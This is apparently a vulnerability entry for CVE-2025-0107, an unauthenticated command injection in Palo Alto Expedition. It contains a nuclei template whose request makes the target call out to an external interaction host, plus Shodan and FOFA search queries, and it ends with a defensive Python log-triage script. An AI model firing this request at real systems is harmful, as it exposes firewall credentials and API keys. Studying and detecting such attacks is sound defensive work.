An OS command injection vulnerability in Palo Alto Networks Expedition enables an unauthenticated attacker to run arbitrary OS commands as the www-data user in Expedition, which results in the disclosure of usernames, cleartext passwords, device configurations, and device API keys for firewalls running PAN-OS software.
PoC code [published]
id: CVE-2025-0107

info:
  name: Palo Alto Networks Expedition - OS Command Injection
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    An OS command injection vulnerability in Palo Alto Networks Expedition enables an unauthenticated attacker to run arbitrary OS commands as the www-data user in Expedition, which results in the disclosure of usernames, cleartext passwords, device configurations, and device API keys for firewalls running PAN-OS software.
  reference:
    - https://security.paloaltonetworks.com/PAN-SA-2025-0001
    - https://ssd-disclosure.com/ssd-advisory-palo-alto-expedition-rce-regionsdiscovery/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-0107
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    epss-score: 0.23403
    epss-percentile: 0.95765
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Expedition"
    fofa-query: title=="Expedition Project"
  tags: cve,cve2025,rce,paloalto,expedition,vkev

http:
  - raw:
      - |
        GET /API/regionsDiscovery.php?master=spark%3A%2F%2F{{interactsh-url}}:443&mask=26&project=your_project&devices=device1%2Cdevice2&mtserver=127.0.0.1%3A3306&mtuser=root&mtpassword=paloalto&task-id=1193&mode=pre-analysis&regions=&parquetPath=%2Ftmp&timezone=Europe%2FHelsinki&mlserver=127.0.0.1&debug=false&initDate=2023-01-01&endDate=2023-01-31 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'msg":"Started'
          - '"success":true'
        condition: and

      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 490a0046304402203fd40326a1be2a8b123b839f2f58009017ddefb2c0006a99b3b4fe12d0a6167002204f1816b94617d88d594c867ca516596b774995748692d0370a093fb0ff7b4c04:922c64590222798bb761d5b6d8e72950
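For defenders, the request shape the template above sends is also what to look for in the Expedition web server's access log. The following is an added example (not part of the advisory or the nuclei template) that triages Apache combined-format log lines: it flags every hit on /API/regionsDiscovery.php and raises the severity when the master parameter points to a host other than the local machine, as the PoC does. The log lines are constructed, and the hostnames in them are placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Jan/2025:10:14:02 +0000] "GET /API/regionsDiscovery.php?master=spark%3A%2F%2Fabc.oast.example%3A443&mask=26&project=your_project&regions=&debug=false HTTP/1.1" 200 61 "-" "curl/8.4.0"
10.0.0.5 - - [12/Jan/2025:10:15:30 +0000] "GET /API/regionsDiscovery.php?master=spark%3A%2F%2F127.0.0.1%3A7077&project=p1 HTTP/1.1" 200 61 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Jan/2025:10:16:01 +0000] "GET /login.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
ENDPOINT = "/API/regionsDiscovery.php"
LOCAL_HOSTS = {"127.0.0.1", "localhost", "::1"}

def master_host(master):
    """Hostname from a spark://host:port value, or None if it is empty or not a URL."""
    try:
        return urlsplit(master).hostname
    except ValueError:
        return None

def classify(line):
    """Return a finding dict for a regionsDiscovery.php hit, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if url.path != ENDPOINT:
        return None
    params = parse_qs(url.query)            # values arrive URL-decoded, as lists
    master = params.get("master", [""])[0]
    host = master_host(master)
    external = host is not None and host not in LOCAL_HOSTS
    return {
        "src": m.group("ip"),
        "time": m.group("ts"),
        "master": master,
        # CVE-2025-0107 is unauthenticated, so every hit deserves review;
        # a master pointing off-box (the PoC's pattern) is the strongest signal.
        "severity": "high" if external else "review",
    }

def scan(log_text):
    """Findings for every line of the log, high-severity entries first."""
    findings = [f for f in map(classify, log_text.splitlines()) if f]
    return sorted(findings, key=lambda f: f["severity"] != "high")

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The shell-metacharacter content of an actual injection is not matched on purpose; the endpoint and an external master host are the signals the advisory itself supports.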